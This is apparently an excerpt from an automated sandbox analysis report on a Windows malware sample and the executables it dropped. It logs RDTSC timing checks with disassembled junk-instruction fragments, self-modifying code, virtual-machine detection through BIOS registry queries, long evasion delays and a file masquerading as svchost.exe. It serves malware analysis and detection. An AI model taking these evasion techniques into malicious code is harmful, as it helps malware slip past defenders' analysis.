                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0A67 second address: 4FB0A6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0A6D second address: 4FB0A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0A73 second address: 4FB0A77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0A77 second address: 4FB0AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F80F2AF00ADh 0x0000000e jmp 00007F8080B8A788h 0x00000013 mov edx, dword ptr [ebp+0Ch] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F8080B8A77Dh 0x0000001d sbb si, F246h 0x00000022 jmp 00007F8080B8A781h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov edx, eax 0x0000002d pushfd 0x0000002e jmp 00007F8080B8A788h 0x00000033 sbb cx, 0A18h 0x00000038 jmp 00007F8080B8A77Bh 0x0000003d popfd 0x0000003e popad 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0AFD second address: 4FB0B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0B01 second address: 4FB0B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A77Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0B13 second address: 4FB0B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0B19 second address: 4FB0B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0B1D second address: 4FB0B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0B21 second address: 4FB0B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 jmp 00007F8080B8A789h 0x0000000e xchg eax, ebx 0x0000000f jmp 00007F8080B8A77Eh 0x00000014 push eax 0x00000015 jmp 00007F8080B8A77Bh 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8080B8A785h 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0B76 second address: 4FB0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0C26 second address: 4FB0C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8080B8A77Eh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FB0C38 second address: 4FB0C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0E1B second address: 4FC0E75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov dh, D8h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F8080B8A780h 0x00000012 sub al, 00000048h 0x00000015 jmp 00007F8080B8A77Bh 0x0000001a popfd 0x0000001b mov eax, 67A09BBFh 0x00000020 popad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8080B8A77Eh 0x0000002b or cx, A2A8h 0x00000030 jmp 00007F8080B8A77Bh 0x00000035 popfd 0x00000036 mov dx, si 0x00000039 popad 0x0000003a rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0E75 second address: 4FC0E7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0E7B second address: 4FC0E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0E9F second address: 4FC0EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FC0EA3 second address: 4FC0EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5040756 second address: 5040765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5040765 second address: 50407A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F8080B8A77Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F8080B8A77Ch 0x00000018 push ecx 0x00000019 pop edx 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50407A4 second address: 50407AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50407AA second address: 50407AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5030A4F second address: 5030A6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5030A6A second address: 5030A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5030A70 second address: 5030A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 50308AF second address: 50308F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 push edi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebp 0x0000000b jmp 00007F8080B8A77Ah 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007F8080B8A780h 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b call 00007F8080B8A77Dh 0x00000020 pop ebx 0x00000021 popad 0x00000022 pop ebp 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 movzx esi, dx 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD0268 second address: 4FD026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 4FD026E second address: 4FD0272 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5030DAD second address: 5030DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5030DB1 second address: 5030DB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 5030DB5 second address: 5030DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: A2F2F8 second address: A2F319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8080B8A787h 0x0000000f rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA2D98 second address: BA2DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8080FFFC56h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeRDTSC instruction interceptor: First address: 2CB5F7 second address: 2CB5FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA81B3 second address: BA81BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pop edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA862A second address: BA864A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080B8A787h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA864A second address: BA8650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA8650 second address: BA8654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA8654 second address: BA865A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA865A second address: BA8660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BA8660 second address: BA8664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB745 second address: BAB77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A782h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8080B8A786h 0x00000019 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB77C second address: BAB798 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d js 00007F8080FFFC56h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F8080FFFC56h 0x0000001c rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB798 second address: BAB79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB79C second address: BAB836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007F8080FFFC65h 0x00000011 pop eax 0x00000012 jmp 00007F8080FFFC62h 0x00000017 jp 00007F8080FFFC5Ch 0x0000001d push 00000003h 0x0000001f xor si, 0F87h 0x00000024 push 00000000h 0x00000026 mov di, 50E3h 0x0000002a push 00000003h 0x0000002c jnc 00007F8080FFFC5Eh 0x00000032 push 88FBE958h 0x00000037 pushad 0x00000038 push edx 0x00000039 push edx 0x0000003a pop edx 0x0000003b pop edx 0x0000003c jno 00007F8080FFFC58h 0x00000042 popad 0x00000043 xor dword ptr [esp], 48FBE958h 0x0000004a xor dword ptr [ebp+122D1B49h], esi 0x00000050 lea ebx, dword ptr [ebp+1245059Ch] 0x00000056 jg 00007F8080FFFC61h 0x0000005c jc 00007F8080FFFC5Bh 0x00000062 mov esi, 0E1549DBh 0x00000067 xchg eax, ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pushad 0x0000006c popad 0x0000006d pop edi 0x0000006e rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB836 second address: BAB83D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB882 second address: BAB89F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080FFFC63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB89F second address: BAB931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8080B8A781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F8080B8A778h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 xor ecx, 59A6EEC4h 0x0000002b pushad 0x0000002c mov ebx, 7A619ED5h 0x00000031 jmp 00007F8080B8A77Bh 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F8080B8A778h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 add dword ptr [ebp+122D212Bh], ebx 0x00000059 call 00007F8080B8A779h 0x0000005e push eax 0x0000005f push edx 0x00000060 push ecx 0x00000061 jne 00007F8080B8A776h 0x00000067 pop ecx 0x00000068 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB931 second address: BAB938 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB938 second address: BAB961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F8080B8A788h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB961 second address: BAB965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB965 second address: BAB9F3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d jl 00007F8080B8A77Ah 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b jne 00007F8080B8A79Bh 0x00000021 pop eax 0x00000022 mov dword ptr [ebp+122D1DF7h], eax 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D1884h] 0x00000030 mov dword ptr [ebp+122D200Dh], eax 0x00000036 push 00000000h 0x00000038 sub dword ptr [ebp+122D1D90h], ecx 0x0000003e push 00000003h 0x00000040 mov esi, dword ptr [ebp+122D2A37h] 0x00000046 call 00007F8080B8A779h 0x0000004b pushad 0x0000004c pushad 0x0000004d jmp 00007F8080B8A77Dh 0x00000052 jc 00007F8080B8A776h 0x00000058 popad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB9F3 second address: BAB9F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BAB9F7 second address: BABA03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BABA03 second address: BABA20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8080FFFC5Ah 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jnc 00007F8080FFFC5Eh 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BABA20 second address: BABA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov eax, dword ptr [eax] 0x00000007 jmp 00007F8080B8A782h 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 jo 00007F8080B8A799h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8080B8A787h 0x0000001d rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BABA5C second address: BABA83 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8080FFFC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b add dword ptr [ebp+122D1C41h], edi 0x00000011 lea ebx, dword ptr [ebp+124505A5h] 0x00000017 mov edx, 45F2D593h 0x0000001c mov dword ptr [ebp+122D20DCh], ecx 0x00000022 push eax 0x00000023 pushad 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BABAF0 second address: BABAFE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BABAFE second address: BABB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRDTSC instruction interceptor: First address: BABB02 second address: BABBD0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8080B8A776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F8080B8A789h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F8080B8A778h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d call 00007F8080B8A784h 0x00000032 pop esi 0x00000033 push 00000000h 0x00000035 adc cx, 6B18h 0x0000003a mov dword ptr [ebp+122D212Bh], eax 0x00000040 call 00007F8080B8A779h 0x00000045 push edi 0x00000046 jmp 00007F8080B8A781h 0x0000004b pop edi 0x0000004c push eax 0x0000004d jmp 00007F8080B8A77Fh 0x00000052 mov eax, dword ptr [esp+04h] 0x00000056 jmp 00007F8080B8A789h 0x0000005b mov eax, dword ptr [eax] 0x0000005d jmp 00007F8080B8A781h 0x00000062 mov dword ptr [esp+04h], eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSpecial instruction interceptor: First address: 11C16E instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSpecial instruction interceptor: First address: 2E5864 instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSpecial instruction interceptor: First address: 2C754B instructions caused by: Self-modifying code
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeSpecial instruction interceptor: First address: 341FA2 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: A2C16E instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: BF5864 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: BD754B instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: C51FA2 instructions caused by: Self-modifying code
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeMemory allocated: 4E30000 memory reserve | memory write watchJump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeMemory allocated: 29E0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeMemory allocated: 2B90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeMemory allocated: 4B90000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 1660000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 33C0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 19E0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 5990000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 6990000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 6AC0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000202001\hello.exeMemory allocated: 7AC0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeMemory allocated: 1640000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeMemory allocated: 3210000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000240001\newstart.exeMemory allocated: 5210000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeMemory allocated: CF0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\1000241001\see.exeMemory allocated: 1A6D0000 memory reserve | memory write watch
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeMemory allocated: 5700000 memory reserve | memory write watch
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeMemory allocated: 5A70000 memory reserve | memory write watch
                                Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exeMemory allocated: 59B0000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeMemory allocated: 5970000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeMemory allocated: 5970000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeMemory allocated: 7970000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                Source: C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                Source: C:\Users\user\Desktop\mlk3kK6uLZ.exeCode function: 0_2_05030CF0 rdtsc 0_2_05030CF0
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeThread delayed: delay time: 922337203685477
